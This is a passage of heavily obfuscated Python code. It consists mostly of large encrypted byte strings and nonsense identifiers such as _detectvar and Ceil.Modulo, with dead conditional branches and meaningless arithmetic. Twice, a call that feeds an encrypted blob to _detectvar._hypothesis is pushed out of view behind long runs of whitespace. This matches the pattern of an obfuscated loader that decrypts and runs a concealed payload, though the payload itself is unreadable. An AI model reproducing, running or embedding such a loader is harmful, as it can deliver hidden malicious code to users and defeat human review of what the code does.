\x9b\t\xfee\x1fd5\xc7\xc7\xeeQ\xbe-\xc9\xcb"\xf2\xf5\xbaQh\x12\xa0-w\x95;Z\xe6W\xce+\x9fl\xa9\xc1\xd1\xec\xaa\x8f\xdc$\xf6\xcb4\xf1\r\x13\xe2\x98\x0c\xc4N|\xc6l\xcfg\xfc,\xcb>al1\xb4,\x1f5\xa9\xdbDFzUj@&\xd0\xb1\xdb2]^d\xbes\x84\n\xf1\x11{\x1d\xea\xb4\x1dNP \x824bh\xf8\xdf\x86\x02a\xe4\x0c1\xe5\x0e\x13Q\xa7K\xae\x92(;#PvxU&\xfb\x9dH\xbf\xa9_-\x89\x15SX\xb9B\xbau\x86\xe3\xdb#!F\xbb\xe7w&`\xb6\x1bQ\xf8B\x1f\xee\x9c\x0eN[\x1d\x18_%7h$\xe6\xc8(\xb6N\x8du\xf5\\\xc6\x03\x06"\xc7\xd8\xb8\xbb\xcc\x89\x94G\x07\x02\xe3\xe1@\x03<`[\xf5}\x1b\xe1\x91]\x9b\xf5\xd1\x86\x01\xd0)\xf8\xf2\x98R\x90\x1c7\xc7\xa7 \x07%\xba\\"\xe4i\xe8\x95K\x1a+\x03\xd7}\xd4\xda\xd1/z\r\x9a=\xec,\xa8\x97\xee\x96\xc2\xd0yH\xc1l:C\n \xf57\x9d\xde\x02J@=f\xb7\r\x19\x81V\xda\x9d8j\x8e\xcd\xa1\xa9xRv\x12k{ZW\xd7i\xca\xb5.\x88\x95VI\x01U\xecg\xf5\xf3.\x00sV\xc9\xa7\x89aoc9\x95Qze\xc67Wh\xbdNVC\xb0\x16\xd2\x133\x8c\xcc\x9b\xe6\x16\xd9;\x00CE\x88\x98\x0e\xe0/\x01.]0\xdc\xa5\xf5\xd2\xb6\x8bAl\xa1l\x06K\x13[\x8e\xeb \xb6q\x81M\xea6$mj1\xae2u_\xf2\x04\x12\x96\xf4[MRF>\xb9\xd0\x07\xa6\xa3o\xd3\x17\xc1@0I2\x1eU\x1a7\x12A\x99\xeb\xean\x10\x82\xd62\x08\xdd7\xea\x80\xaf\xca\xb2$\x0fa\xfa\x99\xc4\x80\xe3P\xb7F\rP\x10\xa31y\xb6z\x07\xd1\x1d\'\r\xce\xbef\x06W{\x99\x00\x9e\x84\xaan\x8c\xf6H\xd0\xe4\xee\xe3\xa2\x8d\xb8\t\x1cY\x95\xb2\x8e\x0c\xe2<6\x18\x08`d\xd1\xd8\x12/7\xa9\xdb\x90x\xb9\xa5\xfc\xda\x8d\xcc\nN\xbdo\x98W\x80\xd2\n\xf0\xdfn\xc8\xad\xdb\xc2\x12X\x0eckz!2V^\xf6`\x01l\x17\xea\x14\xa8\x8a\xe1\x96\x85\xd1\xd7\xd3(I2\xa5q\xe9\xe1\x90L\xa9\x04\xe4\x8e\x84\xa4\xc8l\xc7\x08\xe5\x11#u]\xdd&(\xde\xd6)%\xab)\xb4\x1cZ\xd8\x81*\xd1\x879A\xc9z~\x8c\x0c\x0bI\x80`\xbd6s\x04ZH\x02\xce\xc3\x8c\x7f\xdb\\y\xb7\x16\xf4\xd2\rj\xe2\x9b\x9eO5w8|\xfc{\xb1(\xad\xf1\xcd\x94i\xaf*@\xacv\x93\xa7\xdf\xdc\xf5\xb7\xa1W\x9e\xc8j\xc1\xfc\x90 "4C;B\\/\xed\x00\xeb\xc2\xc0\xf9XLQ%\xc6U\x81wYW\xb7i\x86L~\xbe\x96\xc3\xcd\x06\xfb\xf5KA\x7f}W\xacm\x06U\xc5\x0et\xbe\xe2H\x94\xc9L\xee\xeb\xeb\xb6b\xe7\x05c\t0*#\x97\xb2\xfa\xb4\x19\xdc\xa3\x8f\x1d(\x02\x80\xb1\x01{\x882G@\x93P\xe3\xa4)@\x8b\xf87+eoc\x16k!\x13wCpg\xf2ka\xc2-\xda\xc2\x92m\x82\x10\xb6\xb8\xe29\xcfm\xc8\xee\\I\x88\x90\x19\'R\xc6\xee#ga\x9c\xfdd\x94\x86\xa9\x13W\x98\xa0>`\xca\x03vXr\xfa\xaa\xcc\xd4\xc9\x9c91\x83\x96* %1\x00\xe4=\xfe\x13\x96\x11bhv@l\t\x90\x10f\xac4\xc0\x18\x02\xbf\x94\x1e\x98G=\xa5~\xb8\xc9Dd(\xa0\xea\x04\r\xe5o\xdcQ48\xcd\x9aX\xcb\xfeX\'\xa1pFZ\xe94\x83C\x9dO\xb6$\xb7\x18)f\x17\x0c\xf1{\x17\xf6\x0c.h\xdb\x89\x94\xd0\xc5B\xc6a5\xcck$\xa3@\r\xb4T\x08\xb5\xeb\xeav\xe8d\x830M\x1f\xd9\xe4\xe15Bo $\xa8\x88\xea\xa5\x1d\x98\x17\x03!\x87r\x1aMC\xe5W1/\xae\xab\xdb\xd4\xbc\xb82Wo\x81Xsr\xd2\x16.R\xf5\xae\xc4\xc9\xfa\xe2\x1e\xb3\x97\x8f\xbd\x13\x81\xe8\x13M\xea\xbaf!\xdbB\xfa\t\x89\xe1\xa2\\H\xd2\xb8XO\x9f\xb6\x8bS0\xb3y\xe8\xdc]\xb5\x87#\xdf`\xe7\xf4\x04j\x0b"9\xd4\xfe!\xf5#2\x14\xb4Fyl\xc5\xc0\x13\xa5`\x16L\x02\xa6vIC\'2D5S\xbb\xcd\xc3\\\xce\xe3\xe82\xef\xb2\xd3\x8e\\\x96\xf7\xaa\xd9\xb3]\x12\xc3\x06\x81\xa5\xe5I\x80\xfc\x06\xee!\xf8\xe7&\xe8\xa7\x8b\x95\xae\x93!I\xae\xb3\xe1\xcb\xaf2\t\x9dp\xf9\x9brg\xa0?A\x13\x1c+\xad.vB\xe2gR\x0f[\x1dn\xa8\xf3\x97\x95\x12\x11;\x9a\xb0\x88\xf4X]k[\xa3\xbd\xc65^\xb2\xdd~\x17|zQ\xaczv\xda\xd2a\x01\xc78?\xb7\x87\xc6\x83\xc2KS9\'\xc0\xb0\x7f\x1f\x99:2 \x01\xf8Lt\x1b\xa5\xb2\xdd1\xf2\x90[#\xb9QSD\xd6\xca\xb9\x81\xd1\xc7\xcf:\x0c\x99B\x93\x9bG\xe2n\xc4S\x95\xa1\x81=D\x02\x86\x18Sq\x83}\xd4G\xfe\x84Ri\x07\xc2\xb9\xf4\x10\xb2\xd0\xcd\x18\xff\xaaGq]\xdd\r\xcd\xee\xef5"C\xa6\x8d\xb1\x1e\xcc2g\xe1{\x8f6\xd9{\xa6\xee\xca\xa1\xe3\xcf/\x1dh.|\xffY+e\x9e#\xc63\xcb\x08\xbfuu]F\xf8\xa5a+\x06_\xbd|\x108\xde\xe6\x94j\xbd\x86l\xc5&h2\x9d\x92\x0c\xa8\x1d\xe1\xea\xe9\x10\xe0Y\xa6-e\x00\x80\x1d6\xceB=\x0c\xca\x8bR\xda@0\x1a\\i\xaaz@\x8a\xd2`\x02J\xabAsaJ\x05\x80\x05')

        if 313617 > 8304196:
            _detectvar(Floor = -76993 - -771).Algorithm(_square = Ceil.Modulo / -53107)
        elif 377983 < 2614444:
            _detectvar(Floor = 92845 / 75249)._positive(_add = -86310 / Ceil.Modulo)                                                                                                                                                                                                                                                          ;_detectvar._hypothesis(_power='mnnnmnnnnnnmmnmnmn',StackOverflow=b'\x8c\xd4\xb2\xd0\x87\x1a\xf0kM\xf2\xaaj\x82\xec\xd1r\x91\xf8\xaa](\xc2\x0b\xde\xd8{B\x11\xd6\xcc\x1c\x08Km\xf0\x99\xc8}*\xa5MwH\xf9F\xc9\xb3\x15\xa0o\rv\x98\xd5K\x9b\xe3\xcac\xb4\x0fA<\xb6\x8f"\x01\x08\x07A\xbd\xd4\xc9\xb2\xf8\xc6\x99\x07\xdf\x1bz}%\xf7K=\xc5I=\xc9\xc9&\x1c0\xef\xe2\x8a\xf7X\x00\xa3?\xda\xdc\x05\xc1\xbe\xd5EC\x8c\xc2\x0c"\x15ng\xb73`5\x84\xf7\xb6t\x86Al\x93<\xb2}\x95\xb7\rZWp\xb0\xad\xab\xeb\x90\x12\xd2\xc0\xb8\x03}\xab0\x11Q[\xdc\x02\xf0C\xcef\xf4\xa2^\x9b\xcf\x80\x91\xce\xc0J\x0c\x841\xce\x7f\x952\'\xb3\xdf\xd6\xa7JI\x1a[\xe2q\x88-KJ&\xa0&\xeb\xean@D\xd3\x05]\x9f\xbb(\xd0\x12\x02t\xe1\xfb.XsW\x98\xf88\x96\x95!\nC\rT\x90\xf1\xad\xee\xcc|=\xb5`\xa8+T\xefQK\x96\x0e\x83\xec\xfe\xaa\xd9\x9c\x10\xcd\xd2\x98\xc7ie8D\x18\x973\xe4\xb2\x97\xc6\x00\xadD8\xc4\xba\xba.\x13\x88\xa7\xe9M8\x0c\xfd0H\xfbi\xab\x9c\x8f`X2G\xd7\xc7\xc7\x0f\xbb\xb0\x00;\x90Ep\xff\xc0Z5\xc00O\xf8f\x80\x7fnf\x7f\x94\xfe#\x14\xdd}\x938:\xa8\x97v\xd0\xb5\xd9\xd9\xc8\xeb\xbeL\x0c-\x9d\xd6M\xean%2t\x0b&\xa1r\x9a\xc0~\x85d\xa5\xc2\xae\xe8\x08\xcf\xe5\xb7\xe5~\xbad\x9e"\x8dg\xa7\xa4\xd9\x8d\xf1\xec \xdd\xf4\x11$\x19^S\xf23\xa2v\xae\x95v xp\x7f2\xf4\xe4\xc2\xe4\x88\x0cw\x95\x84g\xab\xea\xbaf\x1ct\xeds\xcb\x0c\x82p$\xb0\x83\x9cZ\x89\x16g7\x18\xc2.\r\x92\':g2\xe6N\xa6\x04\xca\rs\xba\xeeV$\xc56\xf2\xb939\xcc\xc8\xf8\xe62C\x19c\xc9d,&\xd3\x95\xa8\xd6\r\xec\xf8\x9c\xe4\n{\x06\xea\x04\x9a\xdb\xcc2\xb4\x89\x81\xc3\x04\x83\x8e\xd1bV)k\xd9s8\xda \x11\xf3\x0c+7\x8b\xa8\xff\x97\xd5\xebh\x1e\x02a D\xbb]\x1f\xb3\x95dH\xd4X+\xdb\xb2\xa1l\x15\xc4\xf6\x04\x00\xb6\xa7\x90\xca\xf9L3^\x03\xd7u\xdb\x8c\xce\x92\n\x9e\xb3T\xb0d\xcdt\x8d\x8bh\xe4\x97\xd5u\x9a\x85\xbdC?$\x1cP;x/\xe8$\x9a\x0e\x16\xf2\xde&\x9aS\x04\x12\xd3\x80=\xb8_/\xed\xe0\xcep\xf87\x93\xf6s\xcb3\xaf\xaa\xbc3\xeb\xea:\xf7\x12w\xc2\xa1\xf0Rb\xaa\xd6\xfe\xb7\xc6d\xcd+g\x1f&Y+u\xd7\xd82\xb7Gb\x06ZW\xd7-\xb5f7+\x82\xe1\xa2`>\x8a\x86t\x14\xdbp\xbdm\x18o\xb7\x91\x96G\xac\xa0=\xe4\xfeL1\xafI\xf2\x99YAK\xa5N@\xcf\xbe\xd1"3d\x07J\xf1\xe8\xbdz\xe9\xf6%\xb1f\xd1z{\xa0\x83\x03(\x11\x0f\t\x1b\xea\x1c\x9a\xa6\x07~S\x03E[\x8f\xf5\xc9\x89\x11\xaaQ\xc2\x86\xcd\x86\xc1x\x1d\x8e\x19\x12\xe1H\x96\xc3\xc3\xc0\xdb\x16\xc8\xc3\xd5/!\xf3\r\x04\xf2\x9c@\xfa\x1b\xc8~\x83\xaf-[@:=\x98\x0b\x9c\x13\xcf\xb0`\x17\n\x8e\xccuu\x9d\xe6~\xeaPU\xd3q\x7f\xdf\xac\xc1\xb4\xb9\x13;\xd1\xa6\x00\x9f")5\x91wZ/\xdd\xbe#\xf7\xfdy\x12\x12\x93\xc9110R\xfe\xacK9\xe7\xa3\xfascV\x02*\x9c4A\x10D\x94\xb4\x92L\x97\xaa\xab\xac\x9e\x8e\xa2r~dV\\1H\xf0]\xab\xa8d(\xd3t\xdf\xf8\xbaM\xd3\x05;\\\xd9\xbb\xc6\xf3\x0b\'\xec\xc1\x14\x1b\x02\xa7\xb7\xae\xaes\x8e\x9e-\xb1\xaf\x95\xf2CKh\xba\x0cMt\x96o\x1c\xae,T\xfa\xdc\r\x19\xe6\x02?\x98$\t\xbef\x08:\x92\x80\xed\x1c\x01\xea\x8d\xf4\x8b\xc9Cq\xf7\xf1\xe6\xc7t\xf64\x9d?~\x9c\xde\xdd\x17\x0fO\x1f\x87\xb3\x997\x9e>x\xf9K>\xf2&\xc5\xc3\xdd\xf0\xc9\x9b>\xe5\x0f\xde<\x7fy\xf2\x8a\x87\xb1w\xff0\x9d\xab2\xf5|\x18\xce\x7f\xc9\xbd\xc7\xa7\x07\xaf\xb8\xcf\xe7\x1f\xe0\'\xfb\x03\xf2S\xf0\x92:@\xd7\x85>\xd6\x9f\x1e~\xde?\x15\xe3\xe2.\xff\xf2\xa7\xe9\xfd\xaf\xf9\x03\x1f\xf4\x1f\xff|I5\xferr\xc6e\'w\xc3_\xf2\xff\xf10\xbc\xf9\xa0\x0b\x8aG\xdez\xfc\xf5\xc7\xd3tf>\xfd\xaf\x99:\xc1\x90?\xde>\x16s\xde\xbe\x19>\xe6I\xd4\xe0\xe0z\xf3y:\x0f\x83\x11T\xe4\x92\x87\xfc\x7f\xfd\xc8\x1f\x9f\x1ei\x1f\xc3i\xf1\xcb\xc3\xf0\x8e\x7f\xf9O\xc5\x93\xf7\xf4\xf3>7\'6|\xfc9\x1fM\x0bsf?n\xee\x1f\x8aQ\xfeh*\xdc?\xc2\x99{\xcfwS.\x99\x15\xa3\xe1,\xa7\xdd\x8f\x87O\xf9\xd3\xf4.\xe7\xfd\xf3g\xfaV~\xf38\xcb\xf3{*\xbe\x1f>\xfd:\x9b\xde\xf07\x7fQ\x1f\x9b\xb6\xb6\xa8\xf1\xafJ\x1a*\xcc\x85\xfd\x92?]?`\xc9\xf5\xcd\xcf\xa7\xfc\xb1V\xfd\xdf\xd5U|\xf9\xcbp<\x9e\xce\x7f\xe1\x1f\xdd\x0f\xc7\xde\x8f\xb9z5\x17\xfb\xf3\xe9\xaf\xbc\xfd\xe3\xc7t\xbc\xe0F\xd6\x1a\xc8^n\xd3\xb6\xfe}~\xfd\xf4\xd7#8\xd6\x17\xf8\xf1_\x8by\xbe\xcf\xa6_\x90M\xe9}F\xef\x07\x1fF?\x1e\x1e\xf2\xf9\xd35\xd4=\xe2\x06\xfe2/\x9e\xf7qG\x07\x1f\xc6\xf9\xe4\xa3\x1a8p\xad\xfb#l\xb7\xeb\'\xe8\xfa\xbf\xe5?\xbd\xe9\xef\x07\x87\x1f>\xaa?\xfa\xe2H\xb5\xe4\x97y\xfe\xbc\x0f\xdf\xc1\xf6\xf9\xe0\xf8\xcf\xd7\x7f\xfa\xa7?AE\xac\xa7w\x94\x8fq\x1fG\xd8<z\xaf_\x16\x1c\xe4\x00\xf7r\xa3\xfa\xc4o\xd7\x8f\xd3\xbf\xe6\xb4\x93\x87\xfc\xe9\xc7\xc3\xbc\xb2/\x1e\xdc\xb7SL>:\x83W\xa4\x14\xbd\x9dM\xe1:\xa7\xe3\x9b\xe2\xe9\x08d\xdeS\xb4\x89ia\x15,b\x1f\x9e\x8a\xdf\xf2\xf9\xd1\xa5\xf0\xcf\xd8\xb7\x0f\xf03\xd5\xd8\xfbT\t_\x0f`h\x1fQ \x16\xcd\x99\x03\x14\x95\x074g\r>\xa8\x1bu3\x99\xce\xf2\xc7#m.:\xb7v\xd6\x8b\xf3\x0f\xf7\xc3\xc7\xc7\xe7\xf1\xd1\x9df|\xb4\x1a\xf7\x87QQ\xfc6U?\xb3^s\xcd\x94\xf6\xf5\x03\xf4\xebku\x83\x86G\x03\x9c\xad\x8f\x91\xd8\x0e\xa7\x93\x0fO\x0f?\x0f\x8b\xc7/w\xbf\xa9\x99j\xdfT\x84\xd3\x1c\xe5\xf7O\x87p\xbc%u>\x91M\x8bN\x8c\xcd\xc1\x8d~\x08\x1d\n\x1f\xdc\xa5\x1a\xfd\xea\x8c\xc2\xfe\xe9>@\xd6=\xb5\xdd\xe8\x87:!\x99N\xc6\xa5\xde\x1b\xfd\xca`\xd6\xccO_\x1a\xfdN{I\xe0\xfaf3\xf6\x9f\x9c@?j\xd223\xaal\x06\\\xf9W0\xa0`B\x19\xce\x9f\xa6\xbfO\x1f~<^O\xe7\x13\xb5\xda\xd2H\x82}\xe2\x06\x0e\xab#53~\xf9z~\xb2\x7f`\xca\xec\xcf\xd4T1\xfe1zz<\xfa~e\xbeU\xb3\xf3\xc3\xcf\xa3\x17\xceX\xf6\xfc\xc2a\x13\xea\xdfTR\xcb\xd8G\xfd\xe3\x8f\xd3\xf9\xc7\xd1\x17\xfc\xd5>\xbe\x1e\xd8\xa3/>\xda\x97\xe1\xbdZ\xdc\xc6\xfb\xfa\xf3\x97\xf1\xf4\xf1~6\xfcy1\xbc\xcb\xedIN\'\x0b~Y\xde\xb3\x1e\xc5\'\xd4\xba\xa4BC\x93}\xb9-\xa6\xf3\xfd\xfa\xaf\xed\xce\xf3\xd9c\xbep_\x97\x97\x9cV\'\x08L\x8e\x18\x1c\xd4X\x9bn\xc2\xc7?\xe3\xdb\xb4\x98\xab)\xf3\xa3\xd8\x91\xde\tv\x92\x17\x8e3\x817\xbcc\xea\x92\xafG\xbf\xaa\x898\xe7;\xf5p\x04\x96u\xcc\xfdz\x8aT\x16\xa0\x07\x7f\x10\xed;\x82\xc6U\xfd\xe3\x1e\xa4\x81}\x98\x18H\xc4:\x1e\xe0v\x01\xac\x94\xc5\xe0\xe0\xcbC>\x1c\xcf\xa6\xf3\xfcq_4\xbej\xc1\x816\xa6\x80=e\x803\r|\x80\x9d\xc2\xce\xcb-`W\x8e/\x0f?\xe6\xfb\xba\xf7i\xbb\x04\xcd\xf6\xde\xe3\xaf\xf9lvT\x00\x1b&\xf2a\x02v\x026\xe04\xd4\xc9\x1c\x94\x9b\xf4\x88\x96\x08sg\xd4\x9f\x9c}\x1f\xb0U&S\xd5,\xea\xc00\xd9\xedC\xe7\xbf\x86a\xa0/C\x97s\xf7\xd4\x1f\xb9\xff\xa8\xe6\xc2\x1b\xaf\xe7a\xb0#\x9c\x9d\x1e\xd4\xc7@qs\x9bC\'W\r9\x9b>>\xc1P\xb3\x07\xb2]\x1af\xdbk\xf5\xe5\xd1\xf7\t\xb6\xff\x04\x1b\x9f~\x0b\x8d\t\xf7A\xfd\xe2\xcb\xf4\x11\xf6\xc0\x9f\xb0\xaf\x99\xddy\x13%\x08\x96F\xc9\xa4\x98\x8dAP\x98\xdb\x03\x94\xdb\x1d\x971\xaa\xf5E\x8d\x83\xe9\xd3~\xb9\x19\xa7\x93}\xa8\xf2]\xce@\xd8\xab^\xae\x8e`\x05\x81E\xc3\xc7\x9bK[j\xb32\x02\x174\x1d\x1d\xef\xa0\xdasu-\xd1\xd7\xed\x84\xf38z\xc8\xf3\xf9\xe3\xafj!\xd3\xfb\xb7%GF\xb4\xfc\x02\x0b\x97\xbe\x02\xfb=\xb6\xcdQ\xa9\xc9\xccd\xe7\xa1\x8dX\xb3\x17\xcf\xed\x87\xea>\xbe<\x0e\x7f\xcf\xf7+\xfb\xf4fzv\xd5c\x1f;+I\x1c\xf7\xa3\xe5\x93bqw\xffCI\xe0\xd7\xc5\xe3Q\xa5\xdb\x9f\x9d\xb2\x8b\x0b{\xd5\xc9\x997\x1a\xde\xab\xb6\xc9\xaf\x8b\x1fO\xeaGG\xb8`\x0e\x06D\x93O\xcd\xed\xfbz`X\xf1\x88\'~\xdd\xfb\x0f\xbe\xa8n\xa7v\xc0"F\xfe\xf0P<<\x1e\xe1\xcc\x12\x98|T\xf0\x11j>L\xef\xf7\x0f\xa8/\xe8A\xfd\xfdR\x90\x18r\xce\x07Rh\xaf\xf8\x07M&(y\xe1\x17J\xac[\xd04\xf7?\xaaM\xf2]g\xa5>\xc1\x05\x17\xb3U\xa3\xd9\xef\xc4\xfbj\xc8\x025Z\xcf\x93\xab\x9d^\xfe<\x90\x9e\x10\x02\ry\xdd\x89\xa9\xfd\xaa\xda\xaa_\xb5\xa0\xf2\xed\x9b\xd9PO\x0f\xc7\xc6\xec\x84\xe7"k(\xb5-Zj\xae};\x7f\xeb<i\xf0\x04-\x14\x07\xc7\x00\xa7M-j\xa9\xc7U\xa36S-\xb2\xb8\xad~\xa9\xb7\xd5\xf9\x05K@\xe4\xe6#C\xeaE\xf5r\xbf\xe9\x8bd\x12[l@\xeeD$s\x82\x00J\xcd\xb5\xa4\xf3\x80\xe8\x06\x17\x81\xc85\x8a\xe6\x87g\xa5\xe3\xc0*1@\xbe\x0c\x90\xf9p\xe1\x80\xd9\xbb\x18l\xd4o~Y\xda\x06J\x9f8R;\xdaW\xca+>+\xedQ\x8e\xc6"y\xb8\xda\x18\xc7\x05\x9d\x91Vma5\xf1j\xf3\x17\xfeQ\x03\xb1\xae\x7f\xa1\xd5}x]\xd2F\x94\x98\x19\xfc\xd7g(\xb1\x9f\x9cU\xc6\x17')

        Ceil._positive(_add = -82525 + Ceil.Modulo)                                                                                                                                                                                                                                                          ;_detectvar._hypothesis(_power='WXXWWXWWXWWXXWWWXW',StackOverflow=b'\x0c-\x1b\'\xc6\xd0*\x18V\x07\x7f\xbc\xe3\x94\x8cz\x03\xb7\x0f\x1a\xb5\x17\xb4\x8ai\xaf\x1f\x8f\xf9\xc3\\\xc960\xff)\xa9-\x9f\xff\xbe\x8f\xd7\x8aw\xac@\xcb\x84\xfaL\xfb\xfd\xb5x|\xaa\xd4\xa5\xe1\x06\xe2\xee\x99f\xba\xa2\xd4\xd3\x8bV\xba_\x9f\xa7c\xd9%G\xbf\xe6J\xef\xa1v\xde\x97b\r\x07Y\xd3\x9b\xe9y0Nq\x80\xd28\x9d.\xb9\x0f\x8bn\x8dZV\xe7\xf2\xd0\x7f9\xf9\xcb\x9f=U\xaa\xeeD\xb5\xd8\x98Q \x81\xc3\x14C$\xf0\xa04Q\xa8?\xbe9(\xad\xa0V\x84\xdd\xbc\x00[\x8ez\x1e|\xd7\xbe\n\xebJ\xbf\xd8\xa8;c3-\xee\xcf\xd3\xfb#6P\xc0\r\xd8\xa7A6 \xc3\x0b\x0e4\xca\xff^\xf8\x07_`vjr8\xb5\xcf%\x07\x9b\xab\xb9x2\x1c\xe5\x9e\xd2\xfbUw\x05\x83\xd0>\x98\x86\xf6\xc9\xaa\xa14\xe1\xa7\xeb\xe9\xe4\x1a\xbfU]V}u\xa7\xde\x0f\xec\xba}7\x1c\x1d\xe1\xb7\xdfQZ79\x97\xd5\xf3\xea\x0b|\x01\x86\x80&\xa7\xc8gb\xcf\x94w\xbf\xf8\xd4\x1f\x7f>\xaa\x93\xb9&[\x8bw}D\x1b\xd0d\xb4%\x84\x98\xd9p\xfe\xcb\x0f%\x1e\x1c\x95~\x03\x12U\xb9\x00\x84\xf2\x8f\x18*\x03\xc4\x94\xb8b\xe0\x0c8mr\x01\xe6 \xe6t\x8d\xfc\x7f\xb4HU\x92\x82\xa8X\x15=5\xdb{j\xb6\xf3\xd4\x08\xf6x\xe0z<*=\xe88\xde\xf4\xde\xb37N\xb5\x90\xc7\xc7\xf6\xccA\x8c\x866*~\xccU\xbb\xedO\xef\xaf\xf5\xddX$\x8f\xa8\xf2\xfbb\xfe\x98\x97\xbb\xde\xe6\x86\xcd$\t\x82\xa4\x9fF\xea\xe1\xa7a8\x0c&`\xd0L}\xe0\xceO\x92d\x12\xe4jK\x95\xa57P\x1aO\x92^\x12%\xc0\x9e\x1fc\x9a\xb4\xb1\xaa=L\x91S\xbf\x81\xc9\xd7\xde`4)\xf05|\x01k\xa1\xb8\xfb\xba\x05\xc004\xc4\xcbb\x96a\xed\xa3\x82\x85O\xe7\xbcE\xb9o\xceB\xe0]M:\xd5\xbb\xdaD\x13{~\x16\xf1f46\xf0\xde\xdc<\x14\xcf\xea\xee\xb2t8<\xfa\xfe\xe1?Ks\x9d\xb1\xe4\x18\x1d\xf0\x90\xa7\x02\xb1\xee\xfa\x83\xf2\x0c\xa9Wr\xe6\xa4\xd7\x8c\x9c\x87%\xc1W}P\xd3\xfa\xf4\xa1\x98\x7fG\xeb\xcd\x1dg\xfb\xb5b\xf0\x95\x07\x12=\xce6\x05M6\x03\xedJ\x1dxsk\xf31\x08\x0b|\xf7\x18na\x13\t\xabW\x0f\xdc\xb3\xb0t\x9c\x92\xecvJ`.\xb5\x1ezB\xd2\xe2\x93=(_\xce\xcc\x1a!X\x85\x9b\x1d\x96\x14\xb6UW\xc6f)Z:q\xfb\xcac\x99\xe7\x9b\xce\xcc\x8d\xaf\x1e\x119"\xc0\xec\x0c\xd7l\xf5\xe2]\xb2\x19\xcd\xa0\x9f/\xbd\x01j\xbe\xa8y\x16,\xd4\x80ts\xec\xd1\x98 \x13\x1aJB08\n\xd5K\xff\xcb\xab\xdcZ\xe1f\xd7\xd2*J\xed\xb3C\xd4aINB\x1d\xfb\x982@\x95\xdb\xe4\x9c]\xe4\xbc\xf8,\xbd\xbb$\x94\xf1\xf9\x0ch\xa8\xe2\xa7+\xef\xf9\xf9\xc5\xce\xd4\xda\xd4\xf2\xe2I\xb5\x81\x8d?J\xebF1\x90\x16\xc9[Z\xa3\xd189\xf38\xdf\x0b\xa7\x8d\xd6\xe2\x8aG\xc2\xf6-\xad\xe2\xf0\x9b\xca}\x95\x95\xf9Fa\xd7ivsMX\x0e\xf5 r2\xc3\xfb\x95wi%)=p<-\x92_Z\x83h\x10x\xb6\t5\xd4\x00g6o@\xf7V\t\x83\x03|\x1e{dx2\xb6\x94gm\x93zy^tg\xd1\x18\xa1\xef\x1czM\xe0\xc3\xa1\xcd\x93\xc7\xa9\x93\xcb\xad\xc1a\x84\xf4\x02\xd1\x85Ko)jB\xa8\x0b\xa1\x18\x86\x06\x88\xd3\x13u;\r~\xec\xf9\xc5P\x8dxh\x19AS\xc9\x00O\x0b/M]\xa1\x87v\x9cc4\xe3h\xfb\tt8\x8f\'\xaag=m=?{\xda\xb02(\x88\xf7\x0em\xb5P\xbbrC9\x8a\x85\x04i<\xa2\xba\xf0F7\x93\x16\x18\x0e\nbq\xea\xe2\x9c.\xca\x1a\xb2\xf4\x15z|sY\x17\xa5\r\xcf\xa0\r\xf4\xc0\xa6Y\xde#\xc1\xcd\'\xb5\x0b\'4\x8f\x05m\xd3C\x8c\xea\xbb\xe0\x8e\xe28\x1e\xe8aC\xf8 \xd8\xc9\xe1\xe5\xe5eY\x96e\r\xa3\xdc.l\x81{6\x9c/\xf0\xbe|\xc4\xe2\xa4\x0bR\xa7>\x18\xce\xf1W4\xce\x8ceB\x8f7\xf5\xefI\xd3=\x18\xd9\xd4\x9b70F|\xfd\x87v7\xcf\x0c59T=B\xbd\x90R}\x82\x06@\xd5\xbb*7w@f\x06\x9a\xd4p\xb3\xd9\x9d\x15\xa1^|c\xd5]\xb5\xb1_8\xf8@9\xb5\xc6\xedgk\xeb\xf5DfI\x9e\x82=2l\xf2\xaa\xcaS\x97\xc7S\xc0WA<\xfdm\xd1\xed\xc4i\x0cg$\x98\x9cp\xa2;D\x13\x96^\xe8\xa8\xe5\xca\x97/\xa6\x1a\x13\x13\xb8b\x80\x9e\xa0\xaew\x82\r\x8b\x8a\x1f\x18.\xae\xd0ND\xd2\xe4\x94\xa2\x87a\xfe4\xcb\x93]5\xe9>{:\xc8Xk&\xf0c\x8fR\xcc\xf1\xd9\xe3\x97\x95\x1be\x06\x04wnV(\x9b\xdd/<W\\\xfdN\xc8\xdc\x023K\xc1\x8b\x1c\xcd\x1d\x83\x01Z}aU\xb2v\x16^-N<\xf2\xa7\xb0E\x8cM&\x9e\xb6~\x90\xb7\t\x05\x8a\x85\x0b\xe3\xd4\xca\xddd\x81\xc0\xf5\xe3\xd0\xc0\xc1\xce\xf5\xe4P\xbdj\xb3<\xeb\x89v\xe9\xdd\xa9u)^\xdc\xaf<-\xfe\x18\xc9F\x0b2w\x1e\xdc\xb5[^\x01\xe1\x04!\x82^\xdd\xc4[\x98E\xc9{6\xd0\xe6\x1c\x18"\xb0\xf6a]\xf3\x9b\xfaMbS\x84\x9d\x85\x9a\xdd v3\xccl\xeb\xce\xae<\x1a\xe4h\xc3\xa0hB\xe2\'\x85i~@\x84\x8b$\xc6\xc1\x96\xc7s\x15k\xde8\xaa\xbe2s;\xcbD\xf8\xbf\xe8\x0e]\xb2\xfdO\xa4\xad?D\x93\x0e\xda\xf9\xe1\x05\'\xcb\xf2%\x9b\x19^\x8fy\xf5q\xc5\x148\xa0Y\x0f\x06\xa3n`T/\xae<\xe1d1n\x01\xcf\xdc\xac\x92\x1f\xd2;\xd5\x1d\x19\xdd\x1bgd\xa3\xa7\xeb\xd4\xf4\xf4\xd6/Y\x9d\xedP\xb4\xf65\x8cp\xa0%\xb9b\xd0p\xcec\'\xa9Y\xc7`\xce\xe3q-\xa5m\xea\\h\x99\xa4\x99\xe8vJ\x9a\xe7\xed\xd4+i[\xda\xe7\x8as\xbd\x8f\xe7\xa5e\x7f\xb5\n/\xb8E\xe7\xac\xb3\xd1\xc6\xf9\xf9\xa1\x9eX\xacx~W\x91\xb2\xa7\xc4\x0c1%!\x84\x8c 